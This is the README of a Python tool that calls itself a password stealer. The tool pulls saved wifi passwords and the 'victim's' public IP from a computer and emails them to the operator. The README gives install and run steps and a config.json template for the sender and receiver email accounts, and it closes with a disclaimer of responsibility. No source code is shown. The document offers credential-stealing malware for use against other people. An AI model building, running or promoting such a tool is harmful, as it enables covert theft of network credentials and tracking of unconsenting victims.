A bot made in Python to steal saved wifi passwords in a computer and then report them through email.
- Gives the public ip of the victim when reporting
- Send reports through email for all wifi passwords in a nice format
- pip install -r requirements.txt - Install all packages
- Input your details in config.json
- Run password-stealer.py
Python --> 3.7 or more
{
"from_email": "YOUR EMAIL USED FOR SENDING REPORTS - FOR GMAIL, BE SURE LESS SECURE APP IS ENABLED --> https://devanswers.co/allow-less-secure-apps-access-gmail-account/",
"from_email_password": "YOUR EMAIL USED FOR SENDING REPORTS - PASSWORD",
"to_email": "THE EMAIL TO RECEIVE THE REPORTS"
}
I'm not responsible for whatever actions you did when you are using this program.
Snavellet --> Primary Developer
MIT